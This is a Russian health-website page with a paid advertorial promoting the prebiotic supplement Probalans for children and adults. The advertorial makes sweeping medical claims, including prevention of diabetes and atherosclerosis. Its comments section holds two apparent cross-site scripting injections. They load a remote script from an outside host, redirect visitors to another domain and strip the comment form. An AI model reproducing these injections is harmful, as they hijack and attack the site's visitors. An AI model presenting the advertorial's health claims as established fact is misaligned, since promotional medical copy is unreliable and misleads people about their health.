Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Да здравствует баланс! Пр...  >>  Да здравствует баланс! Пробаланс!
 
Обратная связь
 

Да здравствует баланс! Пробаланс!

Размер шрифта
04 марта 2014 13:17
  • google_analytics: false
  • Нравится

Мы неизменно восхищаемся совершенством человеческого тела, однако кишечник совершенно незаслуженно вынужден ютиться на затворках нашего восторга. У нас захватывает дух от непостижимой сложности головного мозга, от неутомимой работы сердца, от красоты и могучей силы мышц. А кишечник… Ну, а что кишечник?

Да здравствует баланс! Пробаланс!

Трубка и есть трубка, булькает там что-то, вынуждая нас раз в день совершать совершенно не вдохновляющий ритуал. Однако повторимся, это – в высшей степени несправедливо. Без кишки человек не может жить точно так же, как и без сердца и почек, а множество гениальных тонкостей в ее анатомии и физиологии не оставляют сомнений – этот орган является настоящим шедевром высшего творения. Знали ли вы, что площадь всасывания в кишке в несколько раз превышает площадь кожи? Знали ли вы, что в кишке живет почти килограмм полезных бактерий? Знали ли вы, что кишка – пожалуй, один из главных органов иммунной системы, настоящий цербер нашего здоровья?

Поверьте, таких удивительных фактов можно перечислить очень много. Кишечник достоин самого трепетного к себе отношения, особенно это касается детского организма, который еще не сформирован окончательно и легко дестабилизируется под воздействием внешних факторов.

Помочь вам в осуществлении этой заботы призван препарат Пробаланс. Он с замечательной эффективностью устраняет кишечные колики, вздутие живота, метеоризм, запоры и другие симптомы, которые могут возникнуть у вашего ребенка при неожиданных переменах рациона питания или после применения антибактериальных препаратов. В этом случае нарушается баланс микрофлоры кишечника. Грубо говоря, бастионы полезных микробов рушатся, и в микросреде кишки наступает хаос, что и обуславливает нарушение функции пищеварительного тракта.

Компоненты Пробаланса призваны ликвидировать этот хаос. В состав препарата входят пищевые волокна различных типов (как растворимые, так и нерастворимые), а также лактулоза – уникальный углевод, который концентрирует вокруг себя молекулы воды, а вместе с ней – и всевозможные вредные вещества, что приводит к восстановлению кишечной флоры и улучшению качества стула.

Другой интереснейший компонент Пробаланса – порошок топинамбура – также обладает рядом замечательных свойств: он улучшает всасывание кальция, выводит из организма соли тяжелых металлов и приводит в норму перистальтику кишечника.

Фармакологи позаботились и о защите малыша от воздействия пищевых аллергенов. С этой целью в состав препарата добавлено вещество под названием пектин, которое снижает чрезмерную активность местного иммунного ответа.

Но станет ли ребенок принимать эту чудо-формулу? Не будет ли он отплевываться в яростных слезах, добавив к проблемам родителей еще одну? Мамы могут вздохнуть с облегчением: Пробаланс выпускается в форме порошка, который легко растворяется в воде, образуя напиток приятного сладковатого вкуса (спасибо лактулозе!). Кроме того, согласно проведенным исследованиям на базе КДЦ №2 (г. Санкт-Петербург), Пробаланс Детский, при приеме ребенком антибиотиков, сокращает период лихорадки и количества дней заболевания.

Эффективность Пробаланса Детского доказана. Производится в надлежащих условиях, гарантирующих высокое качество и эффективность.

Впрочем, было бы наивным полагать, что только детский кишечник страдает от воздействия пагубных факторов среды. Отнюдь нет: теми же самыми симптомами страдают и взрослые люди. Для них существует соответствующая форма выпуска Пробаланса. Принцип действия в данном случае сохраняется: позитивное влияние на баланс кишечной микрофлоры за счет пребиотиков – веществ, не перевариваемых ферментативной системой человека. Состав препарата отличается лишь отчасти, чтобы соответствовать особенностям физиологии взрослого организма: вместо лактулозы используется арабиногалактан, добавлены пшеничные отруби, а также порошок моркови и свеклы (для насыщения организма витаминами и микроэлементами).

В дополнении к характеристикам, которые были описаны ранее, взрослый Пробаланс обладает рядом весомых преимуществ, которые особенно важны именно для взрослого человека. А именно – наличие большого количества пищевых волокон в препарате позволяет адсорбировать избытки простых углеводов и холестерина, выводя их вместе с каловыми массами. Переоценить значимость этого феномена невозможно, учитывая, какое огромное количество людей болеет сахарным диабетом и атеросклерозом кровеносных сосудов.

Кроме того, научные исследования, проведенные в ГКДЦ №1 (Санкт-Петербург) показали, что Пробаланс эффективно помогает при запорах! Все дело опять-таки в волокнах! Они усиливают перистальтику (сокращение) кишечника, и просто проталкивают все наружу. После этого никакие запоры не страшны!

Поэтому Пробаланс можно и нужно принимать не только для нормализации функции кишечника, но и для профилактики вышеупомянутых хронических заболеваний. Комплексное здоровье организма в целом, основанное на тонкой гармонии взаимодействия между всеми органами, – ведь именно к этому мы и стремимся, не правда ли?

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Вода для всей семьи   Всемирная неделя первичного иммунодефицита начинается в Москве!   Беременность: как обезопасить себя и будущего малыша от вирусов   С какого возраста малышам можно давать иммуномодуляторы?  
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 03 октября 2013Результаты благотворительного марафона «Всем миром»
 
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Убийцы в вашей ванной
Можно ли подгадать с беременностью?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.